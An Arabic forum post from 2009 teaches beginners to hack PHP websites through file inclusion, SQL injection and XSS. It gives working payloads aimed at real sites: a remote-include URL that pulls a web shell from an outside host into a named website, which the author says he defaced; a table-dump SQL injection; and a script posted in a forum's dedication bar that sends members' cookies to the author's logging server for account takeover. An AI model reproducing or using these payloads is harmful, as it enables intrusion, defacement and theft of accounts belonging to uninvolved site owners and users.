عرض مشاركة واحدة
قديم 01-27-2009, 12:51 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
AZOZ
.:: شخصيات هامة ـ::.
 
الصورة الرمزية AZOZ
 

 

 
إحصائية العضو






AZOZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
AZOZ is on a distinguished road

افتراضي


#############################
الثغـرآت واسغلالهـآ والبحث عنهـآ ..
#############################

################################################## ###
ما هي الثغرات ؟؟
الثغره هي عباره عن خطأ برمجي يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه
مثلاً فيه سكريبت مبرمج بالـ php عنده أمر لإدراج بيانات أسماء الأعضاء
الحين أنا أمسك هالملف واطالع فيه فحصته لقيته عادي ينفذ الأمر اللي هو قراءة بيانات الأعضاء
لاحظت فيه خطأ برمجي أقدر من خلاله بدل ما أخلي السكريبت يسوي ادراج لبيانات الأعضاء
خليته يسوي إدراج لملف شيل ^_^ وهذي ثغره نسميها File Include
ومن الشيل عاد انتم تعرفون خطورته ووش نقدر نسوي فيه .. الخ
وهكذا ..
أتمنى فهمتم الزبده اتركوا الكلام الفآضي وخذوا الزبده *_^
################################################## ###
ما هي انواع الثغرات ؟؟
الثغراات كثيييييييره لاتعد ولا تحصى في أنواع كثيره من الأنظمه
حنا في هالكتاب راح نتطرق لثلاث أنواع أساسية في نظام الـ php
وهي
1-File Include(ادراج ملف)
2- Sql Injection (تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
=-=
النوع الأول
هو أخطر أنواع الثغرات ويسري عبر أخطاء برمجية مما يجعل الهكر
يقوم بإدراج ملف شيل خطير يمكنه من التلاعب بالموقع واختراقه وأعتقد الكل يعرف وش هو
وان شاء الله قريب بنزل كتاب عن الروت يعني من خلال هالشيل تقدر تسطير على السيرفر كآمل
بكل مواقعه
-
النوع الثاني
وهذا أقل خطورة من الفايل انكلود ويقوم عبر أخطاء برمجية بإرسال أوامر إلى قاعدة البيانات
مثلاً أمر لقراءة معلومات عضوية الأدمن رقم واحد أو أمر لتغيير كلمة مروره وتقدر تستغلها بأشياء كثير
كمثال
ثغرة sqlمن خلالها نفذنا أمر يقوم بتغيير ايميل عضوية المدير العام للسكريبت المصاب بالثغره
فقمنا بتغيير ايميله مثلاً الى ايميلي vv9@hotmail.comثم اروح للسكريبت واسوي نسيت كلمة المرور
وراح يرسلها لايميلي لووول وبكذا نخترق عضوية المدير العام وندخل لوحة التحكم للسكريبت
وأحلى اندكس اختراق ننزله وبعض السكريبت نقدر نرفع شيل من لوحة التحكم وهكذا ..
-
النوع الثالث
يعتبر أقل خطورة من الأول والثاني وأكيد الكل سمع في هالنوع من الثغرات وحربها
وأقرب مثال ثغرات الـ xssفي موقع الهوتميل
وهذي الثغرات من خلالها نقدر نسحب كوكيز أي عضو بالموقع مثل الهوتميل لكن تعتبر أقل خطورة
في استغلالها لأنها ممكن تدخلنا مثلاً بعضوية المدير العام كمثال في المنتدى
بس هنا خطورتها ضعيفه لأننا لو دخلنا ما نعرف الباس ولو نبي نعرف الباس وش نسوي ؟
لازم نغير الايميل لو دخلنا وغيرنا الايميل ما يتغير لاحظت انه يقول لي دخل الباس القديم وانا معرفه
لأني داخل عن طريق الكوكيز هنا ما نقدر نستغلها في شي *_^
وكذلك الهوتميل دخلنا وقلنا نبي نغير كلمة المرور بالكوكيز يقول ما تقدر تغيرها لازم تعرف القديمه
فكرنا وعرفنا حركه وهي اننا نروح للهوتميل ونقول له نسينا كلمة المرور ويرسل الرابط للانبوكس
وراح نفتحه ونغير كلمة المرور وهكذا ..
وتختلف خطورة هالنوع من الثغرات من سكريبت إلى آخر
################################################## ###
كيفية البحث عن الثغرات ؟؟
موضوع حلو صح ^_^ ايه أكيد حلو لأني أول واحد أحتاجه قبلكم والحمد لله ارتحت منه باقي انتم ترتاحون
رآح نشرح كيف نبحث عن الثغرات في المواقع التالية :-
www.securityfocus.com
www.securityreason.com
www.milw0rm.com
www.google.com
=-=
نمسكها وااحد وااحد ويالله بسم الله
ادخلوا هنا
www.securityfocus.com
بعد ما تدخلوا الموقع
شوفوا الصوره :-


بعدها تلاحظ طلع لنا جدول بآخر الثغرات مرتبة تحت بعض
وبهالشكل :-


وبكذا والحمد لله عرفنا كيف نطلع آخر الثغرات شرح الاستغلال موب الحين في الدرس التالي
لكن خلونا نكمل هالدرس
لو مثلاً نبي نبحث عن ثغرات سكريبت معين بالموقع
شووف في نفس الموقع هذا
طآلع فوق تلقى مربع اكتب فيه اسم السكريبت


تمام الحين لاحظوا طلع لنا كل ثغرات سكريبت الـ Vb شوفوا الصورة :-


الحمد لله كذا انتهينا من طريقة البحث عن الثغرات الحين بمجرد الضغط عليها
راح يطلع لك استغلالها وكل شي واكمال شرحها بالدرس التالي بإذن الله
=-=
طيب لو ما لقينا اللي نبيه في الموقع اللي دخلناه فوق
نجرب في هالموقع
www.securityreason.com
اذا تبي تشووف آخر الثغرات المكتشفة
شووف الصورة :-


ثم راح تطلع لنا آخر الثغرات ومجرد الضغط على اسمها سيتم عرض كل معلوماتها مع استغلالها


طيب لو نبي نبحث عن ثغرات سكريبت معين الطريقة كالتالي :-


ثم


ثم نضغط ور Ok وسيتم البحث وإحضار كل المعلومات بإذن الله
=-=
طيب لو جربنا الموقعين اللي فوق وما عجبنا ولا واحد فيهم ولا لقينا اللي نبيه
نجرب هالموقع
www.milw0rm.com


هذا آخر الثغرات تطلع في الصفحة الرئيسية للموقع
واذا تبي تبحث عن ثغرات سكريبت معين شوف الصورة :-


ثم راح تطلع لك النتائج بالشكل التالي :-


وبكذا والحمد لله شرحنا على موقع ميل ورم
=-=
ولو بعد هذا ما لقينا اللي نبيه في المواقع اللي فوق
نسخدم حبيبنا القوقل لووووول ^_^
www.google.com
ادخل واكتب اسم السكريبت وشووف أخباره وثغراته وكل شي عنه

وبإذن الله بيطلع لك كل شي عن السكريبت
واقراا وخذ لك كوووفي ومخمخ على رااحتك وأقل من راحتك لأن أهم شي في الهكر
وبالأخص مكتشفي الثغرات يكونون على راحة تاامة وصبورين وان شاء الله يوصلون لهدفهم
=-=
وذي هذا الدرس نكون عرفنا بإذن الله كيف ندور على آخر الثغرات وثغرات سكريبتات معينه
الدرس التالي راح يكون لكيفية استغلال هذه الثغرات بإذن الله

################################################## ###
كيفية استغلال الثغرات ؟؟
هذا موضوع مهم ودقيق شوي
راح نشرح استغلال 3 أنواع قووية ومهمة من الثغرات شرحناها في درس سابق وهي :-
وهي
1-File Include(ادراج ملف)
2- Sql Injection (تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
أعتقد اني شرحتها في درس أنواع الثغرات وفصلتها بالتفصيل الممل والحمد لله
=-=
وراح نشرح كل ثغره مع طريقة استغلالها بإذن الله
ونبدأ أول شي
شوفوا هالثغره لقيتها بمواقع السكيورتي :-



شوف طآل عمرك الثغره هذي وترجمتها
اسم السكريبت المصاب + اصدار السكريبت المصاب : WebMatic 2.6
نوع الثغره : File Include
هذا أهم شي في السطر كله وبس
اضغط عليها لرؤيتها وهذا رابط الثغره شوفها :-
http://securityreason.com/exploit*****/1911
شوف طآل عمرك راح أفصل الصفحه لك ان شاء الله شووف


ثم انزل تحت شووي وبتشووف التالي :-


يقول لك طآل عمرك ان فيه خطئين في السكريبت
يعني في السكريبت ثغرتين و Error معناها خطأ
شوف وش يقول لك
Error1 : require($P_INDEX."lib_album.php");
هذا الخطأ البرمجي الأول في السكريبت وسبب لنا ثغرة الفايل انكلود الأولى
وهذا الخطأ الثاني
Error2 : require($P_INDEX."page_album.inc");
وهذي ثغرة ثانية بعد في السكريبت عبارة عن خطأ برمجي أدى الى تكوين ثغرة فايل انكلود ثانية
يعني السكريبت الحين فيه ثغرتين فايل انكلود يا بلاش *_^
وشووف هالأسطر :-
[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
هذي استغلال الثغرتين طآل عمرك
[target] = هنا نكتب رابط الموقع اللي عليه السكريبت
[path] = هنا نكتب اسم المجلد اللي عليه السكريبت مثل المنتدى ( vb )
اللي باللون الزيتي هذا امتداد الثغره وطريقة استغلالها
[Shell] = هنا اكتب رابط شيل انت رافعه على أي موقع ثاني بامتداد (txt)
وهذا الاستغلال كامل الحين روح دور أي موقع بقوقل مركب اصدار WebMatic 2.6
وطبق عليه هالثغره وادعسه
وهذا مثال على موقع مصاب :-
http://www.castillosprayers.com/web/core/index/index_album.php?P_INDEX=http://lecopra.xoompages.com/safe.txt?
اللي باللون الأحمر هذا رابط شيل ch99 انا رافعه على موقع ثاني ولاتنسى علامة الاستفهام
لازم تكتبها ضروري في آخر الشيل بعد كلمة txt
الحين وش راح يصير بعد ما شغلنا هالاستغلال
ثغرة الـ File Include تعني ادراج ملف
اللي راح يصير الحين ان السكريبت راح يسوي ادراج لملف الشيل من الرابط اللي حطيناه في الاستغلال
لداخل الموقع اللي عليه السكريبت وبكذا حنا معنا شيل على الموقع عاد
الحين انت سو العجب والعجااب
انا رفعت اندكس عالموقع لأن صلاحيتي كانت user
وهذا التسجيل بالزون اتش
http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=53992 61
وبكذا الحمد لله انتهينا من شرح استغلال ثغرة الـ File Include
ملاحظه كان الاستغلال على موقع نصراني اللي فوق *_^
=-=
ننتقل الحين لشرح ثغرة Sql Injection
راح أشرح على ثغرة sql انجكشن في سكريبت سجل الزوار وفيه أكثر من ثغره
راح نشرحها بجميع أنواعها
قبل ما أبدأ لازم يكون عندك نسخة من السكريبت اللي تبي تسوي عليه الثغره
أو عندك الكود أو الخطأ البرمجي اللي فيه الثغره
شوفوا هالثغره :-
http://xxx/gb/show.php?do=show&table=hhh
الخطأ البرمجي :-
$result=mysql_query("SELECT * FROM ".$table." order by id DESC") or die(mysql_error());

تلاحظون المتغير $table هذا داخل الاستعلام وطبعاً تعرفون انتم
ان أي كود برمجي يحتوي $table ومدعم بهالسطر :-
$table=$_GET['table'];
يعني الزائر يقدر يستبدل قيمة table بأي كلمة أو أي شي
وهذي ثغره في هالمكان
شوفوا الاستغلال :-
http://xxx/gb/show.php?do=show&table=hhh
يعني حنا الحين نقدر نختار قيمة لـ table وانا كتبت hhh
راح يطلع لنا خطأ يقول لنا الجدول hhh غير موجود في قاعدة البيانات يعني الثغره شغاله 100%
كل اللي علينا نستدعي جدول admin كذا :-
http://localhost/gb/show.php?do=show&table=admin
وسوي تشغيل تلاحظ انه أظهر لنا اسم المستخدم وكلمة مرور المدير العام
من قاعدة البيانات أو بالأصح أظهر لنا محتوى قالب الـ admin
ونقدر نستغله
بأي استغلال على راحتك أي قالب تبيه استعديه مثلا
http://localhost/gb/show.php?do=show&table=mail
اذا أنا ابي ايميلات الأعضاء وهكذا ..
هذي بداية بسيطه في هالنوع من الثغرات يبي لها خبره وواحد مبرمج php
لا تتعامل معها بشكل كبير اذا مالك خبره فيها
اذا تعلمت الفايل انكلود اللي فوق والـ xss وأتقنتهم
وحبيت تتعلم الـ sql حآول تبحث عن كتب وتقرا كثير عنها
والله الموفق ان شاء الله
=-=
طيب الحين عرفنا الفايل انكلود وعرفنا مقدمه بسطه عن ثغرات sql انجكشن
الحين نشرح ثغرات xss
ونااخذ لنا ثغرة xss بالاهداءات في المنتديات
والتطبيق على :-
http://www.3rbgirl.com/vb/index.php
ادخل وسجل بالمنتدى طآل عمرك
أنا سجلت
والحمد لله
=-=
على فكرة الثغره لازم نطبقها بشريط الاهداءات
ابي اكتب اهداءات عشان انزل الثغره يقول لازم 10 مشاركات
برب بشارك وأرجع ..
=-=
المهم شاركت 10 مشاركات لووووووول
>> كنه جاب شي جديد
خلاص لا تهآيطيون ترى المشاركات انجااز بس انتم ما عندكم ذووق أساسا *_^
المهم خلونا في موضوعنا
شاركنا عشر مشاركات يا سلام الحين نرووح نسوي اضافة اهدااء

ثم اكتب دولتك اكتب السعودية أي خرآآط اكتب الشبكه العنكبوتيه
محتوى الاهداء اكتب :
قبل ما نسوي محتوى الاهداء وقف هنا طآل عمرك اترك كل الشاشات مفتوحة
شوف مجلد الشرح هذا تلقى مجلد مرفق معه اسمه log
ادخل المجلد راح تلقى هالملفين


هالملفين راح تستخدمهم في كل ثغرات الـ xss واللي جرب ثغرة الهوتميل يفهم وش أقصد
المهم طآل عمرك لازم يكون عندك موقع أو مساحه مجانية على أي استضافة مجانية
أو حتى مدفووعة
وانا على سبيل المثال عندي
www.hack15.com
لازم ترفع الملفات على موقعك وأنا أفضل استخدام برنامج الـ FTP الشرح هنا
طآل عمرك
ارفع مجلد log على مساحتك
وانا على مساحتي على راح يكون تطبيقي كذا
www.hack15.com/log/
حلو تمام الحين شووف الملفين
cooc2.php >> هالملف ارفعه داخل مجلد log في موقعك بدون أي تعديل
اما ملف cooc1.js
حرره ببرنامج المفكره
[IMG]file:///C:/********s%20and%20Settings/mohd/سطح%20المكتب/دورة%20بسيطه%20لاختراق%20المواقع%20والسيرفرات/دروس%20الدورة/images/ss/7.gif[/IMG]

شبآب ما تحسون إني داج بالشرح ههههههههه ^_^
خلونا نكمل المهم بعد ما سوينا موافق راح يحرر الملف لنا بالمفكره
اذا كان جهازك عربي اضغط على الكيبورد Ctrl+Shift اللي في أيسر الكيبورد عشان نقلب المفكرة
على الجهة اليسرى عشان نكتب بدون أخطاء وأسهل ^_^
شووف الصورة :-


تمام الحين استبدلwww.xxx.comبرابط مسااحتك
انا راح استبدلها برابط مساحتي الناتج كذا
www.hack15.com


ثم سوي حفظ
ثم ارفع ملف coc1.js
الى ملف log بالموقع
تمام الحين أعطي ملف log التصريح 777
حلو تمام الحين انتهينا من هالخطوه والحمد لله
=-=
الحين نقدر نسوي أي ثغرة xss بسهوله
نستخدم استغلال الثغره ونستبدل رابط سرقة الكوكيز برابطنا
مثلاً
هذي ثغرة الكوكيز
تكتب في محتوى اهداءك هالكود :-
<Script>location.href="http://www.hack15.com/log/cooc2.php"+********.coockie</Script>

استبدل اللي باللون الأصفر برابط موقعك او مساحتك واعتمد الكود في الاهداءات
وروح ناام لووول
الحين أي واحد يشوف الاهداءات من الأعضاء أو بالأصح يطب المنتدى ^_^ راح ينسرق كوكيزه
بتقول لي يا حسين وين بيروح الكوكيز ؟
بقول لك طآل عمرك ادخل مجلد log في موقعك تلقى ملف xss.htm
داخله تلقى كل الكوكيزات القط كوكيز المدير العام وأحلى اختراق
وفيه ثغرات تكون في عنوان الموقع
مثل الهوتميل
استغلالها يختلف بشوي لكن أهم شي الملفات تكون عندك
يعني مجرد تعرف الثغره بس تضيف رابط اللوق تبعك واخترق لووووول
كيف تستغل الكوكيز طبعاً يختلف من ثغره لأخرى الهوتميل معروفه ومشروحه ببيت الهكرز
بالنسبة لكوكيزات المنتديات استغلالها هنا :-
http://www.v99x.com/vb/showthread.php?t=783
الشرح لحبيبي صقر غاامد وأحب أقول له ألف ألف مبرووك عالزواج يا قلبي الله يوفقك *_^
والحمد لله كذا استغلينا ثلاث أنواع الثغرات أخطر ثغرات الـ php
والحين أقدر أقول لك انت هكر
================
التوقيع

مازلت لا أفقهى شي ................

http://www.7ammil.com/data/visitors/...836[1].jpg

Mr.AZOZ
Email:hk-r@live.com

 


التعديل الأخير تم بواسطة AZOZ ; 01-27-2009 الساعة 12:54 AM.

   

رد مع اقتباس